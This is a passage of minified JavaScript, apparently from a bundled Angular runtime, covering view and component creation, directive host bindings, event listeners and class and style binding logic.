q=22+i,Y=q+n,te=function wte(t,a){const e=[];for(let i=0;i<a;i++)e.push(i<t?null:mn);return e}(q,Y),pe="function"==typeof k?k():k;return te[1]={type:t,blueprint:te,template:e,queries:null,viewQuery:d,declTNode:a,data:te.slice().fill(null,q),bindingStartIndex:q,expandoStartIndex:Y,hostBindingOpCodes:null,firstCreatePass:!0,firstUpdatePass:!0,staticViewQueries:!1,staticContentQueries:!1,preOrderHooks:null,preOrderCheckHooks:null,contentHooks:null,contentCheckHooks:null,viewHooks:null,viewCheckHooks:null,destroyHooks:null,cleanup:null,contentQueries:null,components:null,directiveRegistry:"function"==typeof r?r():r,pipeRegistry:"function"==typeof c?c():c,firstChild:null,schemas:T,consts:pe,incompleteFirstPass:!1}}function KR(t,a,e,i){const n=oS(a);null===e?n.push(i):(n.push(e),t.firstCreatePass&&rS(t).push(i,n.length-1))}function XR(t,a,e){for(let i in t)if(t.hasOwnProperty(i)){const n=t[i];(e=null===e?{}:e).hasOwnProperty(i)?e[i].push(a,n):e[i]=[a,n]}return e}function YR(t,a){const i=a.directiveEnd,n=t.data,r=a.attrs,c=[];let d=null,T=null;for(let k=a.directiveStart;k<i;k++){const q=n[k],Y=q.inputs,te=null===r||bR(a)?null:Hte(Y,r);c.push(te),d=XR(Y,k,d),T=XR(q.outputs,k,T)}null!==d&&(d.hasOwnProperty("class")&&(a.flags|=16),d.hasOwnProperty("style")&&(a.flags|=32)),a.initialInputs=c,a.inputs=d,a.outputs=T}function ql(t,a,e,i,n,r,c,d){const T=pc(a,e);let q,k=a.inputs;!d&&null!=k&&(q=k[i])?(lD(t,e,q,i,n),ml(a)&&JR(e,a.index)):3&a.type&&(i=function Ste(t){return"class"===t?"className":"for"===t?"htmlFor":"formaction"===t?"formAction":"innerHtml"===t?"innerHTML":"readonly"===t?"readOnly":"tabindex"===t?"tabIndex":t}(i),n=null!=c?c(n,a.value||"",i):n,r.setProperty(T,i,n))}function JR(t,a){const e=us(a,t);16&e[2]||(e[2]|=32)}function nD(t,a,e,i){let n=!1;if(Ku()){const r=function zte(t,a,e){const i=t.directiveRegistry;let n=null;if(i)for(let r=0;r<i.length;r++){const c=i[r];MR(e,c.selectors,!1)&&(n||(n=[]),Km(ah(e,a),t,c.type),gr(c)?(tS(t,e),n.unshift(c)):n.push(c))}return n}(t,a,e),c=null===i?null:{"":-1};if(null!==r){n=!0,iS(e,t.data.length,r.length);for(let q=0;q<r.length;q++){const Y=r[q];Y.providersResolver&&Y.providersResolver(Y)}let d=!1,T=!1,k=K0(t,a,r.length,null);for(let q=0;q<r.length;q++){const Y=r[q];e.mergedAttrs=jm(e.mergedAttrs,Y.hostAttrs),aS(t,e,a,k,Y),Fte(k,Y,c),null!==Y.contentQueries&&(e.flags|=8),(null!==Y.hostBindings||null!==Y.hostAttrs||0!==Y.hostVars)&&(e.flags|=128);const te=Y.type.prototype;!d&&(te.ngOnChanges||te.ngOnInit||te.ngDoCheck)&&((t.preOrderHooks||(t.preOrderHooks=[])).push(e.index),d=!0),!T&&(te.ngOnChanges||te.ngDoCheck)&&((t.preOrderCheckHooks||(t.preOrderCheckHooks=[])).push(e.index),T=!0),k++}YR(t,e)}c&&function Wte(t,a,e){if(a){const i=t.localNames=[];for(let n=0;n<a.length;n+=2){const r=e[a[n+1]];if(null==r)throw new gi(-301,!1);i.push(a[n],r)}}}(e,i,c)}return e.mergedAttrs=jm(e.mergedAttrs,e.attrs),n}function ZR(t,a,e,i,n,r){const c=r.hostBindings;if(c){let d=t.hostBindingOpCodes;null===d&&(d=t.hostBindingOpCodes=[]);const T=~a.index;(function Ote(t){let a=t.length;for(;a>0;){const e=t[--a];if("number"==typeof e&&e<0)return e}return 0})(d)!=T&&d.push(T),d.push(i,n,c)}}function eS(t,a){null!==t.hostBindings&&t.hostBindings(1,a)}function tS(t,a){a.flags|=2,(t.components||(t.components=[])).push(a.index)}function Fte(t,a,e){if(e){if(a.exportAs)for(let i=0;i<a.exportAs.length;i++)e[a.exportAs[i]]=t;gr(a)&&(e[""]=t)}}function iS(t,a,e){t.flags|=1,t.directiveStart=a,t.directiveEnd=a+e,t.providerIndexes=a}function aS(t,a,e,i,n){t.data[i]=n;const r=n.factory||(n.factory=Qd(n.type)),c=new ld(r,gr(n),Ee);t.blueprint[i]=c,e[i]=c,ZR(t,a,0,i,K0(t,e,n.hostVars,mn),n)}function Vte(t,a,e){const i=pc(a,t),n=$R(e),r=t[10],c=yv(t,gv(t,n,null,e.onPush?32:16,i,a,r,r.createRenderer(i,e),null,null,null));t[a.index]=c}function iu(t,a,e,i,n,r){const c=pc(t,a);!function oD(t,a,e,i,n,r,c){if(null==r)t.removeAttribute(a,n,e);else{const d=null==c?Qa(r):c(r,i||"",n);t.setAttribute(a,n,d,e)}}(a[11],c,r,t.value,e,i,n)}function Bte(t,a,e,i,n,r){const c=r[a];if(null!==c){const d=i.setInput;for(let T=0;T<c.length;){const k=c[T++],q=c[T++],Y=c[T++];null!==d?i.setInput(e,Y,k,q):e[q]=Y}}}function Hte(t,a){let e=null,i=0;for(;i<a.length;){const n=a[i];if(0!==n)if(5!==n){if("number"==typeof n)break;t.hasOwnProperty(n)&&(null===e&&(e=[]),e.push(n,t[n],a[i+1])),i+=2}else i+=2;else i+=4}return e}function nS(t,a,e,i){return new Array(t,!0,!1,a,null,0,i,e,null,null)}function Gte(t,a){const e=us(a,t);if(Um(e)){const i=e[1];48&e[2]?Cv(i,e,i.template,e[8]):e[5]>0&&rD(e)}}function rD(t){for(let i=IE(t);null!==i;i=RE(i))for(let n=10;n<i.length;n++){const r=i[n];if(Um(r))if(512&r[2]){const c=r[1];Cv(c,r,c.template,r[8])}else r[5]>0&&rD(r)}const e=t[1].components;if(null!==e)for(let i=0;i<e.length;i++){const n=us(e[i],t);Um(n)&&n[5]>0&&rD(n)}}function jte(t,a){const e=us(a,t),i=e[1];(function Qte(t,a){for(let e=a.length;e<t.blueprint.length;e++)a.push(t.blueprint[e])})(i,e),eD(i,e,e[8])}function yv(t,a){return t[13]?t[14][4]=a:t[13]=a,t[14]=a,a}function sD(t){for(;t;){t[2]|=32;const a=WC(t);if(s0(t)&&!a)return t;t=a}return null}function bv(t,a,e,i=!0){const n=a[10];n.begin&&n.begin();try{Cv(t,a,t.template,e)}catch(c){throw i&&cS(a,c),c}finally{n.end&&n.end()}}function cD(t,a,e){C_(0),a(t,e)}function oS(t){return t[7]||(t[7]=[])}function rS(t){return t.cleanup||(t.cleanup=[])}function sS(t,a,e){return(null===t||gr(t))&&(e=function J2(t){for(;Array.isArray(t);){if("object"==typeof t[1])return t;t=t[0]}return null}(e[a.index])),e[11]}function cS(t,a){const e=t[9],i=e?e.get(yh,null):null;i&&i.handleError(a)}function lD(t,a,e,i,n){for(let r=0;r<e.length;){const c=e[r++],d=e[r++],T=a[c],k=t.data[c];null!==k.setInput?k.setInput(T,n,i,d):T[d]=n}}function vh(t,a,e){const i=$d(a,t);!function aR(t,a,e){t.setValue(a,e)}(t[11],i,e)}function Mv(t,a,e){let i=e?t.styles:null,n=e?t.classes:null,r=0;if(null!==a)for(let c=0;c<a.length;c++){const d=a[c];"number"==typeof d?r=d:1==r?n=rs(n,d):2==r&&(i=rs(i,d+": "+a[++c]+";"))}e?t.styles=i:t.stylesWithoutHost=i,e?t.classes=n:t.classesWithoutHost=n}function vv(t,a,e,i,n=!1){for(;null!==e;){const r=a[e.index];if(null!==r&&i.push(Ar(r)),Is(r))for(let d=10;d<r.length;d++){const T=r[d],k=T[1].firstChild;null!==k&&vv(T[1],T,k,i)}const c=e.type;if(8&c)vv(t,a,e.child,i);else if(32&c){const d=wE(e,a);let T;for(;T=d();)i.push(T)}else if(16&c){const d=fR(a,e);if(Array.isArray(d))i.push(...d);else{const T=WC(a[16]);vv(T[1],T,d,i,!0)}}e=n?e.projectionNext:e.next}return i}class VC{constructor(a,e){this._lView=a,this._cdRefInjectingView=e,this._appRef=null,this._attachedToViewContainer=!1}get rootNodes(){const a=this._lView,e=a[1];return vv(e,a,e.firstChild,[])}get context(){return this._lView[8]}set context(a){this._lView[8]=a}get destroyed(){return 128==(128&this._lView[2])}destroy(){if(this._appRef)this._appRef.detachView(this);else if(this._attachedToViewContainer){const a=this._lView[3];if(Is(a)){const e=a[8],i=e?e.indexOf(this):-1;i>-1&&(PE(a,i),rh(e,i))}this._attachedToViewContainer=!1}oR(this._lView[1],this._lView)}onDestroy(a){KR(this._lView[1],this._lView,null,a)}markForCheck(){sD(this._cdRefInjectingView||this._lView)}detach(){this._lView[2]&=-65}reattach(){this._lView[2]|=64}detectChanges(){bv(this._lView[1],this._lView,this.context)}checkNoChanges(){}attachToViewContainerRef(){if(this._appRef)throw new gi(902,!1);this._attachedToViewContainer=!0}detachFromAppRef(){this._appRef=null,function Iee(t,a){FC(t,a,a[11],2,null,null)}(this._lView[1],this._lView)}attachToAppRef(a){if(this._attachedToViewContainer)throw new gi(902,!1);this._appRef=a}}class $te extends VC{constructor(a){super(a),this._view=a}detectChanges(){const a=this._view;bv(a[1],a,a[8],!1)}checkNoChanges(){}get context(){return null}}class dD extends On{constructor(a){super(),this.ngModule=a}resolveComponentFactory(a){const e=Un(a);return new BC(e,this.ngModule)}}function lS(t){const a=[];for(let e in t)t.hasOwnProperty(e)&&a.push({propName:t[e],templateName:e});return a}class Xte{constructor(a,e){this.injector=a,this.parentInjector=e}get(a,e,i){const n=this.injector.get(a,Ul,i);return n!==Ul||e===Ul?n:this.parentInjector.get(a,e,i)}}class BC extends Yn{constructor(a,e){super(),this.componentDef=a,this.ngModule=e,this.componentType=a.type,this.selector=function Kee(t){return t.map($ee).join(",")}(a.selectors),this.ngContentSelectors=a.ngContentSelectors?a.ngContentSelectors:[],this.isBoundToModule=!!e}get inputs(){return lS(this.componentDef.inputs)}get outputs(){return lS(this.componentDef.outputs)}create(a,e,i,n){let r=(n=n||this.ngModule)instanceof Ht?n:null==n?void 0:n.injector;r&&null!==this.componentDef.getStandaloneInjector&&(r=this.componentDef.getStandaloneInjector(r)||r);const c=r?new Xte(a,r):a,d=c.get(qs,null);if(null===d)throw new gi(407,!1);const T=c.get(gh,null),k=d.createRenderer(null,this.componentDef),q=this.componentDef.selectors[0][0]||"div",Y=i?function Ite(t,a,e){return t.selectRootElement(a,e===dc.ShadowDom)}(k,i,this.componentDef.encapsulation):kE(d.createRenderer(null,this.componentDef),q,function Kte(t){const a=t.toLowerCase();return"svg"===a?"svg":"math"===a?"math":null}(q)),te=this.componentDef.onPush?288:272,pe=aD(0,null,null,1,0,null,null,null,null,null),Re=gv(null,pe,null,te,null,null,d,k,T,c,null);let Fe,Ne;y_(Re);try{const et=function Zte(t,a,e,i,n,r){const c=e[1];e[22]=t;const T=$0(c,22,2,"#host",null),k=T.mergedAttrs=a.hostAttrs;null!==k&&(Mv(T,k,!0),null!==t&&(Lf(n,t,k),null!==T.classes&&WE(n,t,T.classes),null!==T.styles&&gR(n,t,T.styles)));const q=i.createRenderer(t,a),Y=gv(e,$R(a),null,a.onPush?32:16,e[22],T,i,q,r||null,null,null);return c.firstCreatePass&&(Km(ah(T,e),c,a.type),tS(c,T),iS(T,e.length,1)),yv(e,Y),e[22]=Y}(Y,this.componentDef,Re,d,k);if(Y)if(i)Lf(k,Y,["ng-version",Ch.full]);else{const{attrs:ut,classes:Ze}=function Xee(t){const a=[],e=[];let i=1,n=2;for(;i<t.length;){let r=t[i];if("string"==typeof r)2===n?""!==r&&a.push(r,t[++i]):8===n&&e.push(r);else{if(!om(n))break;n=r}i++}return{attrs:a,classes:e}}(this.componentDef.selectors[0]);ut&&Lf(k,Y,ut),Ze&&Ze.length>0&&WE(k,Y,Ze.join(" "))}if(Ne=m_(pe,22),void 0!==e){const ut=Ne.projection=[];for(let Ze=0;Ze<this.ngContentSelectors.length;Ze++){const yt=e[Ze];ut.push(null!=yt?Array.from(yt):null)}}Fe=function eie(t,a,e,i){const n=e[1],r=function Pte(t,a,e){const i=nr();t.firstCreatePass&&(e.providersResolver&&e.providersResolver(e),aS(t,i,a,K0(t,a,1,null),e),YR(t,i));const n=Xm(a,t,i.directiveStart,i);bc(n,a);const r=pc(i,a);return r&&bc(r,a),n}(n,e,a);if(t[8]=e[8]=r,null!==i)for(const d of i)d(r,a);if(a.contentQueries){const d=nr();a.contentQueries(1,r,d.directiveStart)}const c=nr();return!n.firstCreatePass||null===a.hostBindings&&null===a.hostAttrs||(fl(c.index),ZR(e[1],c,0,c.directiveStart,c.directiveEnd,a),eS(a,r)),r}(et,this.componentDef,Re,[tie]),eD(pe,Re,null)}finally{M_()}return new Jte(this.componentType,Fe,Gc(Ne,Re),Re,Ne)}}class Jte extends class ro{}{constructor(a,e,i,n,r){super(),this.location=i,this._rootLView=n,this._tNode=r,this.instance=e,this.hostView=this.changeDetectorRef=new $te(n),this.componentType=a}setInput(a,e){const i=this._tNode.inputs;let n;if(null!==i&&(n=i[a])){const r=this._rootLView;lD(r[1],r,n,a,e),JR(r,this._tNode.index)}}get injector(){return new Ym(this._tNode,this._rootLView)}destroy(){this.hostView.destroy()}onDestroy(a){this.hostView.onDestroy(a)}}function tie(){const t=nr();Ju(bi()[1],t)}function ci(t){let a=function dS(t){return Object.getPrototypeOf(t.prototype).constructor}(t.type),e=!0;const i=[t];for(;a;){let n;if(gr(t))n=a.\u0275cmp||a.\u0275dir;else{if(a.\u0275cmp)throw new gi(903,!1);n=a.\u0275dir}if(n){if(e){i.push(n);const c=t;c.inputs=mD(t.inputs),c.declaredInputs=mD(t.declaredInputs),c.outputs=mD(t.outputs);const d=n.hostBindings;d&&oie(t,d);const T=n.viewQuery,k=n.contentQueries;if(T&&aie(t,T),k&&nie(t,k),Hd(t.inputs,n.inputs),Hd(t.declaredInputs,n.declaredInputs),Hd(t.outputs,n.outputs),gr(n)&&n.data.animation){const q=t.data;q.animation=(q.animation||[]).concat(n.data.animation)}}const r=n.features;if(r)for(let c=0;c<r.length;c++){const d=r[c];d&&d.ngInherit&&d(t),d===ci&&(e=!1)}}a=Object.getPrototypeOf(a)}!function iie(t){let a=0,e=null;for(let i=t.length-1;i>=0;i--){const n=t[i];n.hostVars=a+=n.hostVars,n.hostAttrs=jm(n.hostAttrs,e=jm(e,n.hostAttrs))}}(i)}function mD(t){return t===Ud?{}:t===Xn?[]:t}function aie(t,a){const e=t.viewQuery;t.viewQuery=e?(i,n)=>{a(i,n),e(i,n)}:a}function nie(t,a){const e=t.contentQueries;t.contentQueries=e?(i,n,r)=>{a(i,n,r),e(i,n,r)}:a}function oie(t,a){const e=t.hostBindings;t.hostBindings=e?(i,n)=>{a(i,n),e(i,n)}:a}let Av=null;function X_(){if(!Av){const t=vo.Symbol;if(t&&t.iterator)Av=t.iterator;else{const a=Object.getOwnPropertyNames(Map.prototype);for(let e=0;e<a.length;++e){const i=a[e];"entries"!==i&&"size"!==i&&Map.prototype[i]===Map.prototype.entries&&(Av=i)}}}return Av}function HC(t){return!!uD(t)&&(Array.isArray(t)||!(t instanceof Map)&&X_()in t)}function uD(t){return null!==t&&("function"==typeof t||"object"==typeof t)}function au(t,a,e){return t[a]=e}function Mc(t,a,e){return!Object.is(t[a],e)&&(t[a]=e,!0)}function Y_(t,a,e,i){const n=Mc(t,a,e);return Mc(t,a+1,i)||n}function Rt(t,a,e,i){const n=bi();return Mc(n,sd(),a)&&(Rn(),iu(or(),n,t,a,e,i)),Rt}function Y0(t,a,e,i){return Mc(t,sd(),e)?a+Qa(e)+i:mn}function J0(t,a,e,i,n,r){const d=Y_(t,ul(),e,n);return hl(2),d?a+Qa(e)+i+Qa(n)+r:mn}function Z0(t,a,e,i,n,r,c,d){const k=function Tv(t,a,e,i,n){const r=Y_(t,a,e,i);return Mc(t,a+2,n)||r}(t,ul(),e,n,c);return hl(3),k?a+Qa(e)+i+Qa(n)+r+Qa(c)+d:mn}function ne(t,a,e,i,n,r,c,d){const T=bi(),k=Rn(),q=t+22,Y=k.firstCreatePass?function hie(t,a,e,i,n,r,c,d,T){const k=a.consts,q=$0(a,t,4,c||null,Rs(k,d));nD(a,e,q,Rs(k,T)),Ju(a,q);const Y=q.tViews=aD(2,q,i,n,r,a.directiveRegistry,a.pipeRegistry,null,a.schemas,k);return null!==a.queries&&(a.queries.template(a,q),Y.queries=a.queries.embeddedTView(q)),q}(q,k,T,a,e,i,n,r,c):k.data[q];_c(Y,!1);const te=T[11].createComment("");mv(k,T,te,Y),bc(te,T),yv(T,T[q]=nS(te,T,te,Y)),uc(Y)&&tD(k,T,Y),null!=c&&iD(T,Y,d)}function Ti(t){return Nc(function _0(){return Ua.lFrame.contextLView}(),22+t)}function V(t,a,e){const i=bi();return Mc(i,sd(),a)&&ql(Rn(),or(),i,t,a,i[11],e,!1),V}function hD(t,a,e,i,n){const c=n?"class":"style";lD(t,e,a.inputs[c],c,i)}function m(t,a,e,i){const n=bi(),r=Rn(),c=22+t,d=n[11],T=n[c]=kE(d,a,function lC(){return Ua.lFrame.currentNamespace}()),k=r.firstCreatePass?function _ie(t,a,e,i,n,r,c){const d=a.consts,k=$0(a,t,2,n,Rs(d,r));return nD(a,e,k,Rs(d,c)),null!==k.attrs&&Mv(k,k.attrs,!1),null!==k.mergedAttrs&&Mv(k,k.mergedAttrs,!0),null!==a.queries&&a.queries.elementStart(a,k),k}(c,r,n,0,a,e,i):r.data[c];_c(k,!0);const q=k.mergedAttrs;null!==q&&Lf(d,T,q);const Y=k.classes;null!==Y&&WE(d,T,Y);const te=k.styles;return null!==te&&gR(d,T,te),64!=(64&k.flags)&&mv(r,n,T,k),0===function f_(){return Ua.lFrame.elementDepthCount}()&&bc(T,n),function iC(){Ua.lFrame.elementDepthCount++}(),uc(k)&&(tD(r,n,k),QR(r,k,n)),null!==i&&iD(n,k),m}function u(){let t=nr();Xu()?Yu():(t=t.parent,_c(t,!1));const a=t;!function kf(){Ua.lFrame.elementDepthCount--}();const e=Rn();return e.firstCreatePass&&(Ju(e,t),Gu(t)&&e.queries.elementEnd(t)),null!=a.classesWithoutHost&&function mC(t){return 0!=(16&t.flags)}(a)&&hD(e,a,bi(),a.classesWithoutHost,!0),null!=a.stylesWithoutHost&&function Yd(t){return 0!=(32&t.flags)}(a)&&hD(e,a,bi(),a.stylesWithoutHost,!1),u}function it(t,a,e,i){return m(t,a,e,i),u(),it}function bt(t,a,e){const i=bi(),n=Rn(),r=t+22,c=n.firstCreatePass?function gie(t,a,e,i,n){const r=a.consts,c=Rs(r,i),d=$0(a,t,8,"ng-container",c);return null!==c&&Mv(d,c,!0),nD(a,e,d,Rs(r,n)),null!==a.queries&&a.queries.elementStart(a,d),d}(r,n,i,a,e):n.data[r];_c(c,!0);const d=i[r]=i[11].createComment("");return mv(n,i,d,c),bc(d,i),uc(c)&&(tD(n,i,c),QR(n,c,i)),null!=e&&iD(i,c),bt}function Mt(){let t=nr();const a=Rn();return Xu()?Yu():(t=t.parent,_c(t,!1)),a.firstCreatePass&&(Ju(a,t),Gu(t)&&a.queries.elementEnd(t)),Mt}function Ir(t,a,e){return bt(t,a,e),Mt(),Ir}function Ye(){return bi()}function qC(t){return!!t&&"function"==typeof t.then}function bS(t){return!!t&&"function"==typeof t.subscribe}const fD=bS;function he(t,a,e,i){const n=bi(),r=Rn(),c=nr();return MS(r,n,n[11],c,t,a,0,i),he}function GC(t,a){const e=nr(),i=bi(),n=Rn();return MS(n,i,sS(Of(n.data),e,i),e,t,a),GC}function MS(t,a,e,i,n,r,c,d){const T=uc(i),q=t.firstCreatePass&&rS(t),Y=a[8],te=oS(a);let pe=!0;if(3&i.type||d){const Ne=pc(i,a),et=d?d(Ne):Ne,ut=te.length,Ze=d?It=>d(Ar(It[i.index])):i.index;let yt=null;if(!d&&T&&(yt=function Cie(t,a,e,i){const n=t.cleanup;if(null!=n)for(let r=0;r<n.length-1;r+=2){const c=n[r];if(c===e&&n[r+1]===i){const d=a[7],T=n[r+2];return d.length>T?d[T]:null}"string"==typeof c&&(r+=2)}return null}(t,a,n,i.index)),null!==yt)(yt.__ngLastListenerFn__||yt).__ngNextListenerFn__=r,yt.__ngLastListenerFn__=r,pe=!1;else{r=AS(i,a,Y,r,!1);const It=e.listen(et,n,r);te.push(r,It),q&&q.push(n,Ze,ut,ut+1)}}else r=AS(i,a,Y,r,!1);const Re=i.outputs;let Fe;if(pe&&null!==Re&&(Fe=Re[n])){const Ne=Fe.length;if(Ne)for(let et=0;et<Ne;et+=2){const St=a[Fe[et]][Fe[et+1]].subscribe(r),Nt=te.length;te.push(r,St),q&&q.push(n,i.index,Nt,-(Nt+1))}}}function vS(t,a,e,i){try{return!1!==e(i)}catch(n){return cS(t,n),!1}}function AS(t,a,e,i,n){return function r(c){if(c===Function)return i;sD(2&t.flags?us(t.index,a):a);let T=vS(a,0,i,c),k=r.__ngNextListenerFn__;for(;k;)T=vS(a,0,k,c)&&T,k=k.__ngNextListenerFn__;return n&&!1===T&&(c.preventDefault(),c.returnValue=!1),T}}function B(t=1){return function oC(t){return(Ua.lFrame.contextLView=function rC(t,a){for(;t>0;)a=a[15],t--;return a}(t,Ua.lFrame.contextLView))[8]}(t)}function yie(t,a){let e=null;const i=function qee(t){const a=t.attrs;if(null!=a){const e=a.indexOf(5);if(0==(1&e))return a[e+1]}return null}(t);for(let n=0;n<a.length;n++){const r=a[n];if("*"!==r){if(null===i?MR(t,r,!0):Qee(i,r))return n}else e=n}return e}function Jn(t){const a=bi()[16][6];if(!a.projection){const i=a.projection=ud(t?t.length:1,null),n=i.slice();let r=a.child;for(;null!==r;){const c=t?yie(r,t):0;null!==c&&(n[c]?n[c].projectionNext=r:i[c]=r,n[c]=r),r=r.next}}}function va(t,a=0,e){const i=bi(),n=Rn(),r=$0(n,22+t,16,null,e||null);null===r.projection&&(r.projection=a),Yu(),64!=(64&r.flags)&&function zee(t,a,e){_R(a[11],0,a,e,rR(t,e,a),dR(e.parent||a[6],e,a))}(n,i,r)}function at(t,a,e){return pD(t,"",a,"",e),at}function pD(t,a,e,i,n){const r=bi(),c=Y0(r,a,e,i);return c!==mn&&ql(Rn(),or(),r,t,c,r[11],n,!1),pD}function $c(t,a,e,i,n,r,c){const d=bi(),T=J0(d,a,e,i,n,r);return T!==mn&&ql(Rn(),or(),d,t,T,d[11],c,!1),$c}function SS(t,a,e,i,n){const r=t[e+1],c=null===a;let d=i?rm(r):Mh(r),T=!1;for(;0!==d&&(!1===T||c);){const q=t[d+1];vie(t[d],a)&&(T=!0,t[d+1]=i?GE(q):UE(q)),d=i?rm(q):Mh(q)}T&&(t[e+1]=i?UE(r):GE(r))}function vie(t,a){return null===t||null==a||(Array.isArray(t)?t[1]:t)===a||!(!Array.isArray(t)||"string"!=typeof a)&&yl(t,a)>=0}const Os={textEnd:0,key:0,keyEnd:0,value:0,valueEnd:0};function kS(t){return t.substring(Os.key,Os.keyEnd)}function Aie(t){return t.substring(Os.value,Os.valueEnd)}function PS(t,a){const e=Os.textEnd;return e===a?-1:(a=Os.keyEnd=function Die(t,a,e){for(;a<e&&t.charCodeAt(a)>32;)a++;return a}(t,Os.key=a,e),r1(t,a,e))}function OS(t,a){const e=Os.textEnd;let i=Os.key=r1(t,a,e);return e===i?-1:(i=Os.keyEnd=function xie(t,a,e){let i;for(;a<e&&(45===(i=t.charCodeAt(a))||95===i||(-33&i)>=65&&(-33&i)<=90||i>=48&&i<=57);)a++;return a}(t,i,e),i=LS(t,i,e),i=Os.value=r1(t,i,e),i=Os.valueEnd=function wie(t,a,e){let i=-1,n=-1,r=-1,c=a,d=c;for(;c<e;){const T=t.charCodeAt(c++);if(59===T)return d;34===T||39===T?d=c=zS(t,T,c,e):a===c-4&&85===r&&82===n&&76===i&&40===T?d=c=zS(t,41,c,e):T>32&&(d=c),r=n,n=i,i=-33&T}return d}(t,i,e),LS(t,i,e))}function NS(t){Os.key=0,Os.keyEnd=0,Os.value=0,Os.valueEnd=0,Os.textEnd=t.length}function r1(t,a,e){for(;a<e&&t.charCodeAt(a)<=32;)a++;return a}function LS(t,a,e,i){return(a=r1(t,a,e))<e&&a++,a}function zS(t,a,e,i){let n=-1,r=e;for(;r<i;){const c=t.charCodeAt(r++);if(c==a&&92!==n)return r;n=92==c&&92===n?0:c}throw new Error}function ri(t,a,e){return sm(t,a,e,!1),ri}function Ct(t,a){return sm(t,a,null,!0),Ct}function Iie(t,a){for(let e=function Eie(t){return NS(t),OS(t,r1(t,0,Os.textEnd))}(a);e>=0;e=OS(a,e))VS(t,kS(a),Aie(a))}function _D(t){cm(ps,ou,t,!0)}function ou(t,a){for(let e=function Tie(t){return NS(t),PS(t,r1(t,0,Os.textEnd))}(a);e>=0;e=PS(a,e))ps(t,kS(a),!0)}function sm(t,a,e,i){const n=bi(),r=Rn(),c=hl(2);r.firstUpdatePass&&FS(r,t,c,i),a!==mn&&Mc(n,c,a)&&BS(r,r.data[Ss()],n,n[11],t,n[c+1]=function Lie(t,a){return null==t||("string"==typeof a?t+=a:"object"==typeof t&&(t=Wo(Bc(t)))),t}(a,e),i,c)}function cm(t,a,e,i){const n=Rn(),r=hl(2);n.firstUpdatePass&&FS(n,null,r,i);const c=bi();if(e!==mn&&Mc(c,r,e)){const d=n.data[Ss()];if(US(d,i)&&!WS(n,r)){let T=i?d.classesWithoutHost:d.stylesWithoutHost;null!==T&&(e=rs(T,e||"")),hD(n,d,c,e,i)}else!function Nie(t,a,e,i,n,r,c,d){n===mn&&(n=Xn);let T=0,k=0,q=0<n.length?n[0]:null,Y=0<r.length?r[0]:null;for(;null!==q||null!==Y;){const te=T<n.length?n[T+1]:void 0,pe=k<r.length?r[k+1]:void 0;let Fe,Re=null;q===Y?(T+=2,k+=2,te!==pe&&(Re=Y,Fe=pe)):null===Y||null!==q&&q<Y?(T+=2,Re=q):(k+=2,Re=Y,Fe=pe),null!==Re&&BS(t,a,e,i,Re,Fe,c,d),q=T<n.length?n[T]:null,Y=k<r.length?r[k]:null}}(n,d,c,c[11],c[r+1],c[r+1]=function Oie(t,a,e){if(null==e||""===e)return Xn;const i=[],n=Bc(e);if(Array.isArray(n))for(let r=0;r<n.length;r++)t(i,n[r],!0);else if("object"==typeof n)for(const r in n)n.hasOwnProperty(r)&&t(i,r,n[r]);else"string"==typeof n&&a(i,n);return i}(t,a,e),i,r)}}function WS(t,a){return a>=t.expandoStartIndex}function FS(t,a,e,i){const n=t.data;if(null===n[e+1]){const r=n[Ss()],c=WS(t,e);US(r,i)&&null===a&&!c&&(a=!1),a=function Rie(t,a,e,i){const n=Of(t);let r=i?a.residualClasses:a.residualStyles;if(null===n)0===(i?a.classBindings:a.styleBindings)&&(e=jC(e=gD(null,t,a,e,i),a.attrs,i),r=null);else{const c=a.directiveStylingLast;if(-1===c||t[c]!==n)if(e=gD(n,t,a,e,i),null===r){let T=function Sie(t,a,e){const i=e?a.classBindings:a.styleBindings;if(0!==Mh(i))return t[rm(i)]}(t,a,i);void 0!==T&&Array.isArray(T)&&(T=gD(null,t,a,T[1],i),T=jC(T,a.attrs,i),function kie(t,a,e,i){t[rm(e?a.classBindings:a.styleBindings)]=i}(t,a,i,T))}else r=function Pie(t,a,e){let i;const n=a.directiveEnd;for(let r=1+a.directiveStylingLast;r<n;r++)i=jC(i,t[r].hostAttrs,e);return jC(i,a.attrs,e)}(t,a,i)}return void 0!==r&&(i?a.residualClasses=r:a.residualStyles=r),e}(n,r,a,i),function bie(t,a,e,i,n,r){let c=r?a.classBindings:a.styleBindings,d=rm(c),T=Mh(c);t[i]=e;let q,k=!1;if(Array.isArray(e)){const Y=e;q=Y[1],(null===q||yl(Y,q)>0)&&(k=!0)}else q=e;if(n)if(0!==T){const te=rm(t[d+1]);t[i+1]=fv(te,d),0!==te&&(t[te+1]=qE(t[te+1],i)),t[d+1]=function pte(t,a){return 131071&t|a<<17}(t[d+1],i)}else t[i+1]=fv(d,0),0!==d&&(t[d+1]=qE(t[d+1],i)),d=i;else t[i+1]=fv(T,0),0===d?d=i:t[T+1]=qE(t[T+1],i),T=i;k&&(t[i+1]=UE(t[i+1])),SS(t,q,i,!0),SS(t,q,i,!1),function Mie(t,a,e,i,n){const r=n?t.residualClasses:t.residualStyles;null!=r&&"string"==typeof a&&yl(r,a)>=0&&(e[i+1]=GE(e[i+1]))}(a,q,t,i,r),c=fv(d,T),r?a.classBindings=c:a.styleBindings=c}(n,r,a,e,c,i)}}function gD(t,a,e,i,n){let r=null;const c=e.directiveEnd;let d=e.directiveStylingLast;for(-1===d?d=e.directiveStart:d++;d<c&&(r=a[d],i=jC(i,r.hostAttrs,n),r!==t);)d++;return null!==t&&(e.directiveStylingLast=d),i}function jC(t,a,e){const i=e?1:2;let n=-1;if(null!==a)for(let r=0;r<a.length;r++){const c=a[r];"number"==typeof c?n=c:n===i&&(Array.isArray(t)||(t=void 0===t?[]:["",t]),ps(t,c,!!e||a[++r]))}return void 0===t?null:t}function VS(t,a,e){ps(t,a,Bc(e))}function BS(t,a,e,i,n,r,c,d){if(!(3&a.type))return;const T=t.data,k=T[d+1];Ev(function zR(t){return 1==(1&t)}(k)?HS(T,a,e,n,Mh(k),c):void 0)||(Ev(r)||function LR(t){return 2==(2&t)}(k)&&(r=HS(T,null,e,n,d,c)),function Fee(t,a,e,i,n){if(a)n?t.addClass(e,i):t.removeClass(e,i);else{let r=-1===i.indexOf("-")?void 0:Al.DashCase;null==n?t.removeStyle(e,i,r):("string"==typeof n&&n.endsWith("!important")&&(n=n.slice(0,-10),r|=Al.Important),t.setStyle(e,i,n,r))}}(i,c,$d(Ss(),e),n,r))}function HS(t,a,e,i,n,r){const c=null===a;let d;for(;n>0;){const T=t[n],k=Array.isArray(T),q=k?T[1]:T,Y=null===q;let te=e[n+1];te===mn&&(te=Y?Xn:void 0);let 